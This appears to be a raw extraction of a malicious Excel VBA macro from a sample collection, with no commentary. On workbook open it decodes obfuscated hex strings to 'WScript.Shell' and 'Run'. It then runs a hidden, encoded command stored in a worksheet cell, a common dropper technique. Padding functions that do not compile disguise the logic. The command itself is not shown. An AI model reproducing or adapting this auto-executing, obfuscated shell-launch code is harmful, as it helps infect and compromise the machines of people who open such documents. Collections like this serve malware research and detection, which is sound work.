Filename     : ./macros/21ff245b8109c3d8c101bf21dc860f1f24b2afeb43482ae3b89e338d8eeba9ae
OLE stream   : _VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA filename : ThisWorkbook.cls
----------------------------------------
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function OBNEWIQU() As String
Dim aOBNEWIQU As String
aOBNEWIQU = "4C4C866B7C53834C4C4C294C77464C8C7B4C83834C344C4C334C4C4C284C387A4C3B644C4C4C834C4C834C4C894C4C4C3B4C454C4C"
Dim reOBNEWIQU = aOBNEWIQU
Dim reMsgBox(Mid(aOBNEWIQU & reOBNEWIQU, 28))
End Function

Public Function RPK_(ByVal Y_ As String)
   Dim NVD_ As String
   Dim D_ As Long
   For D_ = 1 To Len(Y_) Step 2
        Dim W_ As Long: W_ = CLng(Chr(38) & Chr(72) & Mid(Y_, D_, 2))
        NVD_ = NVD_ & Chr(W_ - 10)
   Next
   RPK_ = NVD_
End Function
Private Function KWAHFBHC() As String
Dim aKWAHFBHC As String
aKWAHFBHC = "4C4C866B7C53834C4C4C294C77464C8C7B4C83834C344C4C334C4C4C284C387A4C3B644C4C4C834C4C834C4C894C4C4C3B4C454C4C"
Dim reKWAHFBHC = aKWAHFBHC
Dim reMsgBox(Mid(aKWAHFBHC & reKWAHFBHC, 28))
End Function

Sub WFFTKQP_()
    PWD_
End Sub
Private Function RFLVPOEI() As String
Dim aRFLVPOEI As String
aRFLVPOEI = "4C4C866B7C53834C4C4C294C77464C8C7B4C83834C344C4C334C4C4C284C387A4C3B644C4C4C834C4C834C4C894C4C4C3B4C454C4C"
Dim reRFLVPOEI = aRFLVPOEI
Dim reMsgBox(Mid(aRFLVPOEI & reRFLVPOEI, 28))
End Function

Public Sub Document_Open()
    Application.Run RPK_("6150505E555B5A69")
End Sub
Private Function QSPVPGCL() As String
Dim aQSPVPGCL As String
aQSPVPGCL = "4C4C866B7C53834C4C4C294C77464C8C7B4C83834C344C4C334C4C4C284C387A4C3B644C4C4C834C4C834C4C894C4C4C3B4C454C4C"
Dim reQSPVPGCL = aQSPVPGCL
Dim reMsgBox(Mid(aQSPVPGCL & reQSPVPGCL, 28))
End Function

Sub Workbook_Open()
    WFFTKQP_
End Sub
Private Function WJVNOGEI() As String
Dim aWJVNOGEI As String
aWJVNOGEI = "4C4C866B7C53834C4C4C294C77464C8C7B4C83834C344C4C334C4C4C284C387A4C3B644C4C4C834C4C834C4C894C4C4C3B4C454C4C"
Dim reWJVNOGEI = aWJVNOGEI
Dim reMsgBox(Mid(aWJVNOGEI & reWJVNOGEI, 28))
End Function

Public Sub PWD_()
    Dim Y_ As Object: Set Y_ = VBA.CreateObject(RPK_("615D6D7C737A7E385D726F7676"))
    CallByName Y_, RPK_("5C7F78"), VbMethod, RPK_(ThisWorkbook.Sheets("MProp").Range("J225").Value), 0, True
End Sub
Private Function VHLKUFEK() As String
Dim aVHLKUFEK As String
aVHLKUFEK = "4C4C866B7C53834C4C4C294C77464C8C7B4C83834C344C4C334C4C4C284C387A4C3B644C4C4C834C4C834C4C894C4C4C3B4C454C4C"
Dim reVHLKUFEK = aVHLKUFEK
Dim reMsgBox(Mid(aVHLKUFEK & reVHLKUFEK, 28))
End Function

